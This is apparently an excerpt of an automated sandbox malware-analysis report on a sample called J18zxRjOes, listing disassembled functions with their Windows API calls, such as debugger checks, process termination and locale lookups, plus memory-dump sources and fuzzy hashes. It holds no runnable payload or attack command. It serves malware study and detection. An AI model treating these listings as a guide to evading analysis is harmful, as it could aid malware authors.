Instruction Fuzzy Hash: 8831B37490122C9BCB61DF64D9897DCBBB9BF08711F5042EAE80CA7261E7349F858F49

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 006600C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,0066009C,00000000,00457970,0000000C,006601F3,00000000,00000002,00000000), ref: 006600E7
TerminateProcess.KERNEL32(00000000,?,0066009C,00000000,00457970,0000000C,006601F3,00000000,00000002,00000000), ref: 006600EE
ExitProcess.KERNEL32 ref: 00660100

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: ad81b17a75b0eb21e621201e62c644a9081a8a449404e6cbe24eab784ee533fb
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: 7EE0B635000548ABDF116F94DE09A9A7F6AEB46B46F104028FD058B231CB36DE42DA48

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 00668C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00668D23

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction ID: a13ea3b928ce3db12ec8384348bc16852607a643514cc82c17d46566f4b7a98b
Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction Fuzzy Hash: 7D412872500219AFCB209FB9CC49DEB77BAEB84714F504369F905D7280EA719D41CB64

Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438ABC

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 00632605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0063262C
PostQuitMessage.USER32(00000000), ref: 006327CA

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 2634873cb21c5aa7c950a59256d8462d267b3298f4688d5d7d95a99699db1a43
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: DA41302596434095E330FFA5BC55B6533B0FF64722F10252BE528CB2B2E3B28540C75E

Function 0063092B Relevance: 2.6, Strings: 2, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 006309DC, 006309DF, 006309E4
l, xrefs: 00630966

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID: GetProcAddress.$l
API String ID: 0-1376745856
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 9013cb23ad4f06e4f1c28519ed8b1fa9f1e99acf318e961cecb312c3fe85d718
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 043119B6900609DFEB10CF99C880AADBBF6FF48324F15504AD441A7351D771EA49CBA4

Function 00666F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00666F21,?,?,00000008,?,?,0066F3E2,00000000), ref: 00667153

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: e4719126df48c89bb0d8418183b2b1ea6ad2aac840f6260f41d0fd9bb2e1d9c4
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 93B15E71214608DFD715CF28C486BA57BE2FF45368F298659E899CF3A1C335EA92CB40

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 0066B8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

Part of subcall function 00662141: _free.LIBCMT ref: 006621A0
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0066B900

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: b0ab0377709a0e0028a3c0302edba813bcdaabf902663357049b471cfbf8b207
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: BC21B33295020AEBEF249F25DC42BBA73ADEB02310F10127EEE01D7251EB359D84CB94

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 0066B534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,00660A1C,?,0066BC89,00000000,?,?,?), ref: 0066B5A6

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: 8a3da86c6ada94c72c6b0c2067d83cc86df59beacef9bb461c2bfa1d25e64df8
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 6A11E93A2047059FDB189F39C8A16FABB92FF84358B15442DEA4787740D771B942C740

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 0066BADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0066B87A,00000000,00000000,?), ref: 0066BB08

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: d887f9446e420a5c57b5d9ba0c23986ac716f2cb504e46e560fcfa148a1b7226
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: 77F0F432A00116EBDB289A24CC45BFAB76AEB40714F080469ED06E3244EF70BE8286D4

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 0066B8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

Part of subcall function 00662141: _free.LIBCMT ref: 006621A0
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0066B900

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction ID: 56022f93b69f14a38fbb57c5239b76003f372d0ba5bf8c8cb5200df0037647de
Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction Fuzzy Hash: A2014932B55115DBCB14AF34DC51ABA73A9DF06311F0442BEFF02DB282DA755D008754

Function 0066B5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,00660A1C,?,0066BC4D,00660A1C,?,?,?,?,?,00660A1C,?,?), ref: 0066B61B

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: cf92fcf5a45441904548dba4b4952e3a2ba1128e924aaa291222fd4a3939d9f3
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: 77F022363007049FDB245F39DC81BBABB92EF80328F14402CFA06CB641D7719C428604

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 00665427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0066047A,?,00000004), ref: 0066547A

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: f78dcf918f098e2502226d559b416c61c9abf297ac8f0cfb8d1a0929e327166c
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: 66F09631681718BBDB115F50DC03F6E7B66EF04B12F504159FD0666290DA719D20A6DE

Function 00665034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0065E654: RtlEnterCriticalSection.NTDLL(001E0DAF), ref: 0065E663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0066506C

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: 01efe1c042ad049cb853d6bb2ad6e3c2112addd3fe19c4a64b28210e89ea14c5
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: 63F04F32A20304DFEB54EF68D906B5D77F1AF05722F10416AFA00DB2E2C7759944CB49

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 0066B4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0066BCAB,00660A1C,?,?,?,?,?,00660A1C,?,?,?), ref: 0066B520

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: 619d11485548f31f1a089a13e2ae3f23746da7766d9f1590210dc8161b75837b
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: 43F0553A30020997CB089F36DC157AABF95EFC2750B0A005DEF0ACB290D7319882C790

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 006408CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0063FE60), ref: 006408D2

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
